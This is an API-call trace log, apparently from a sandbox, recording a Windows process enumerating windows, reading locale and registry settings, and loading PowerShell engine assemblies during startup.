	[0631.890] GetWindowThreadProcessId (in: hWnd=0x10196, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x730
	[0631.890] GetWindowThreadProcessId (in: hWnd=0x10192, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x2c8
	[0631.890] GetWindowThreadProcessId (in: hWnd=0x1018e, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x31c
	[0631.890] GetWindowThreadProcessId (in: hWnd=0x1018a, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x330
	[0631.890] GetWindowThreadProcessId (in: hWnd=0x10186, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x128
	[0631.890] GetWindowThreadProcessId (in: hWnd=0x10182, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x5c8
	[0631.891] GetWindowThreadProcessId (in: hWnd=0x1017e, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x6f8
	[0631.891] GetWindowThreadProcessId (in: hWnd=0x1017a, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x358
	[0631.891] GetWindowThreadProcessId (in: hWnd=0x10176, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x73c
	[0631.891] GetWindowThreadProcessId (in: hWnd=0x10172, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xb0
	[0631.891] GetWindowThreadProcessId (in: hWnd=0x1016e, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x250
	[0631.891] GetWindowThreadProcessId (in: hWnd=0x1016a, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x240
	[0631.891] GetWindowThreadProcessId (in: hWnd=0x20160, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x790
	[0631.891] GetWindowThreadProcessId (in: hWnd=0x70110, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x61c
	[0631.891] GetWindowThreadProcessId (in: hWnd=0x1013a, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x568
	[0631.891] GetWindowThreadProcessId (in: hWnd=0x10132, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x538
	[0631.891] GetWindowThreadProcessId (in: hWnd=0x10128, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x540
	[0631.891] GetWindowThreadProcessId (in: hWnd=0x20104, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x460
	[0631.891] GetWindowThreadProcessId (in: hWnd=0x2002a, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x79c
	[0631.892] GetWindowThreadProcessId (in: hWnd=0x1005a, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x4e0
	[0631.892] GetWindowThreadProcessId (in: hWnd=0x10048, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x460
	[0631.892] GetWindowThreadProcessId (in: hWnd=0x2001a, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x778
	[0631.895] WerSetFlags () returned 0x0
	[0631.904] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1
	[0631.904] CoTaskMemFree (pv=0x0) 
	[0631.905] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x24e128, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x24e120 | out: pulNumLanguages=0x24e128, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x24e120) returned 1
	[0631.905] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x24e128, pwszLanguagesBuffer=0x2b95478, pcchLanguagesBuffer=0x24e120 | out: pulNumLanguages=0x24e128, pwszLanguagesBuffer=0x2b95478, pcchLanguagesBuffer=0x24e120) returned 1
	[0631.911] CoTaskMemAlloc (cb=0x24) returned 0x51c770
	[0631.911] GetUserDefaultLocaleName (in: lpLocaleName=0x51c770, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6
	[0631.911] CoTaskMemFree (pv=0x51c770) 
	[0631.947] CoTaskMemAlloc (cb=0x104) returned 0x51cbd0
	[0631.947] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x51cbd0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0631.947] CoTaskMemFree (pv=0x51cbd0) 
	[0631.949] CoTaskMemAlloc (cb=0x104) returned 0x51cbd0
	[0631.949] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x51cbd0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0631.949] CoTaskMemFree (pv=0x51cbd0) 
	[0631.951] CoTaskMemAlloc (cb=0x104) returned 0x51cbd0
	[0631.951] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x51cbd0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0631.951] CoTaskMemFree (pv=0x51cbd0) 
	[0631.962] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24daf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0631.962] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24db90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0631.962] SetErrorMode (uMode=0x1) returned 0x1
	[0631.963] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x24dda0 | out: lpFileInformation=0x24dda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0631.963] SetErrorMode (uMode=0x1) returned 0x1
	[0631.963] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x24e010 | out: lpdwHandle=0x24e010) returned 0x94c
	[0631.964] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2b98d08 | out: lpData=0x2b98d08) returned 1
	[0631.965] VerQueryValueW (in: pBlock=0x2b98d08, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x24df88, puLen=0x24df80 | out: lplpBuffer=0x24df88*=0x2b98da4, puLen=0x24df80) returned 1
	[0631.965] VerQueryValueW (in: pBlock=0x2b98d08, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x24def8, puLen=0x24def0 | out: lplpBuffer=0x24def8*=0x2b98e80, puLen=0x24def0) returned 1
	[0631.965] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0631.965] CoTaskMemAlloc (cb=0x2e) returned 0x520930
	[0631.966] lstrcpyW (in: lpString1=0x520930, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0631.966] CoTaskMemFree (pv=0x520930) 
	[0631.966] VerQueryValueW (in: pBlock=0x2b98d08, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x24def8, puLen=0x24def0 | out: lplpBuffer=0x24def8*=0x2b98ed4, puLen=0x24def0) returned 1
	[0631.966] lstrlenW (lpString="System.Management.Automation") returned 28
	[0631.966] CoTaskMemAlloc (cb=0x3c) returned 0x527990
	[0631.966] lstrcpyW (in: lpString1=0x527990, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0631.966] CoTaskMemFree (pv=0x527990) 
	[0631.966] VerQueryValueW (in: pBlock=0x2b98d08, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x24def8, puLen=0x24def0 | out: lplpBuffer=0x24def8*=0x2b98f30, puLen=0x24def0) returned 1
	[0631.966] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0631.966] CoTaskMemAlloc (cb=0x20) returned 0x51c5f0
	[0631.966] lstrcpyW (in: lpString1=0x51c5f0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0631.966] CoTaskMemFree (pv=0x51c5f0) 
	[0631.966] VerQueryValueW (in: pBlock=0x2b98d08, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x24def8, puLen=0x24def0 | out: lplpBuffer=0x24def8*=0x2b98f70, puLen=0x24def0) returned 1
	[0631.966] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0631.966] CoTaskMemAlloc (cb=0x44) returned 0x527990
	[0631.966] lstrcpyW (in: lpString1=0x527990, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0631.966] CoTaskMemFree (pv=0x527990) 
	[0631.967] VerQueryValueW (in: pBlock=0x2b98d08, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x24def8, puLen=0x24def0 | out: lplpBuffer=0x24def8*=0x2b98fd8, puLen=0x24def0) returned 1
	[0631.967] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0631.967] CoTaskMemAlloc (cb=0x76) returned 0x4bf340
	[0631.967] lstrcpyW (in: lpString1=0x4bf340, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0631.967] CoTaskMemFree (pv=0x4bf340) 
	[0631.967] VerQueryValueW (in: pBlock=0x2b98d08, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x24def8, puLen=0x24def0 | out: lplpBuffer=0x24def8*=0x2b99074, puLen=0x24def0) returned 1
	[0631.967] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0631.967] CoTaskMemAlloc (cb=0x44) returned 0x527990
	[0631.967] lstrcpyW (in: lpString1=0x527990, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0631.967] CoTaskMemFree (pv=0x527990) 
	[0631.967] VerQueryValueW (in: pBlock=0x2b98d08, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x24def8, puLen=0x24def0 | out: lplpBuffer=0x24def8*=0x2b990d8, puLen=0x24def0) returned 1
	[0631.967] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0631.967] CoTaskMemAlloc (cb=0x58) returned 0x482760
	[0631.967] lstrcpyW (in: lpString1=0x482760, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0631.968] CoTaskMemFree (pv=0x482760) 
	[0631.968] VerQueryValueW (in: pBlock=0x2b98d08, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x24def8, puLen=0x24def0 | out: lplpBuffer=0x24def8*=0x2b99154, puLen=0x24def0) returned 1
	[0631.968] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0631.968] CoTaskMemAlloc (cb=0x20) returned 0x51c5f0
	[0631.968] lstrcpyW (in: lpString1=0x51c5f0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0631.968] CoTaskMemFree (pv=0x51c5f0) 
	[0631.968] VerQueryValueW (in: pBlock=0x2b98d08, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x24def8, puLen=0x24def0 | out: lplpBuffer=0x24def8*=0x2b98dfc, puLen=0x24def0) returned 1
	[0631.968] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0631.968] CoTaskMemAlloc (cb=0x66) returned 0x517220
	[0631.968] lstrcpyW (in: lpString1=0x517220, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0631.968] CoTaskMemFree (pv=0x517220) 
	[0631.968] VerQueryValueW (in: pBlock=0x2b98d08, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x24def8, puLen=0x24def0 | out: lplpBuffer=0x24def8*=0x0, puLen=0x24def0) returned 0
	[0631.968] VerQueryValueW (in: pBlock=0x2b98d08, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x24def8, puLen=0x24def0 | out: lplpBuffer=0x24def8*=0x0, puLen=0x24def0) returned 0
	[0631.968] VerQueryValueW (in: pBlock=0x2b98d08, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x24def8, puLen=0x24def0 | out: lplpBuffer=0x24def8*=0x0, puLen=0x24def0) returned 0
	[0631.968] VerQueryValueW (in: pBlock=0x2b98d08, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x24dec8, puLen=0x24dec0 | out: lplpBuffer=0x24dec8*=0x2b98da4, puLen=0x24dec0) returned 1
	[0631.968] CoTaskMemAlloc (cb=0x204) returned 0x4c7640
	[0631.968] VerLanguageNameW (in: wLang=0x0, szLang=0x4c7640, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0631.969] CoTaskMemFree (pv=0x4c7640) 
	[0631.969] VerQueryValueW (in: pBlock=0x2b98d08, lpSubBlock="\\", lplpBuffer=0x24df18, puLen=0x24df10 | out: lplpBuffer=0x24df18*=0x2b98d30, puLen=0x24df10) returned 1
	[0631.978] CoTaskMemAlloc (cb=0x104) returned 0x51cbd0
	[0631.979] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x51cbd0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0631.979] CoTaskMemFree (pv=0x51cbd0) 
	[0631.984] CoTaskMemAlloc (cb=0x104) returned 0x51cbd0
	[0631.984] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x51cbd0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0631.984] CoTaskMemFree (pv=0x51cbd0) 
	[0631.988] lstrlenW (lpString="䅁") returned 1
	[0632.000] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24dde8 | out: phkResult=0x24dde8*=0x2fc) returned 0x0
	[0632.001] RegOpenKeyExW (in: hKey=0x2fc, lpSubKey="1", ulOptions=0x0, samDesired=0x20019, phkResult=0x24ddd8 | out: phkResult=0x24ddd8*=0x300) returned 0x0
	[0632.001] RegOpenKeyExW (in: hKey=0x300, lpSubKey="PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x24de68 | out: phkResult=0x24de68*=0x304) returned 0x0
	[0634.310] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24ddac, lpData=0x0, lpcbData=0x24dda8*=0x0 | out: lpType=0x24ddac*=0x1, lpData=0x0, lpcbData=0x24dda8*=0x56) returned 0x0
	[0634.311] CoTaskMemAlloc (cb=0x5a) returned 0x5171b0
	[0634.311] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24dd7c, lpData=0x5171b0, lpcbData=0x24dd78*=0x56 | out: lpType=0x24dd7c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x24dd78*=0x56) returned 0x0
	[0634.311] CoTaskMemFree (pv=0x5171b0) 
	[0634.318] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0634.321] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0634.328] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0636.302] CoTaskMemAlloc (cb=0x104) returned 0x51cbd0
	[0636.302] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x51cbd0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0636.302] CoTaskMemFree (pv=0x51cbd0) 
	[0647.367] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x24d9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0647.367] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x24d9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0651.060] CoTaskMemAlloc (cb=0x104) returned 0x51cce0
	[0651.060] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x51cce0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0651.060] CoTaskMemFree (pv=0x51cce0) 
	[0651.068] CoTaskMemAlloc (cb=0x104) returned 0x51cce0
	[0651.068] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x51cce0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0651.069] CoTaskMemFree (pv=0x51cce0) 
	[0652.584] CoTaskMemAlloc (cb=0x104) returned 0x51cce0
	[0652.584] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x51cce0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0652.584] CoTaskMemFree (pv=0x51cce0) 
	[0652.586] CoTaskMemAlloc (cb=0x104) returned 0x51cce0
	[0652.586] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x51cce0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0652.586] CoTaskMemFree (pv=0x51cce0) 
	[0652.586] CoTaskMemAlloc (cb=0x104) returned 0x51cce0
	[0652.586] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x51cce0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0652.587] CoTaskMemFree (pv=0x51cce0) 
	[0656.193] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x24d9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0656.193] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x24d9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0657.703] CoTaskMemAlloc (cb=0x104) returned 0x51cce0
	[0657.703] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x51cce0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0657.703] CoTaskMemFree (pv=0x51cce0) 
	[0657.705] CoTaskMemAlloc (cb=0x104) returned 0x51cce0
	[0657.705] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x51cce0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0657.705] CoTaskMemFree (pv=0x51cce0) 
	[0659.506] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0659.506] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0671.392] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x24d9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0671.392] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x24d9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0675.817] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0675.818] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0682.805] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x24d9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0682.805] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x24d9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0696.711] CoTaskMemAlloc (cb=0x104) returned 0x51cf00
	[0696.711] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x51cf00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0696.711] CoTaskMemFree (pv=0x51cf00) 
	[0696.713] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24dba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0696.714] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24daf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0696.714] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24daf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0696.722] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24daf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0703.679] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x24dac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0703.679] SetErrorMode (uMode=0x1) returned 0x1
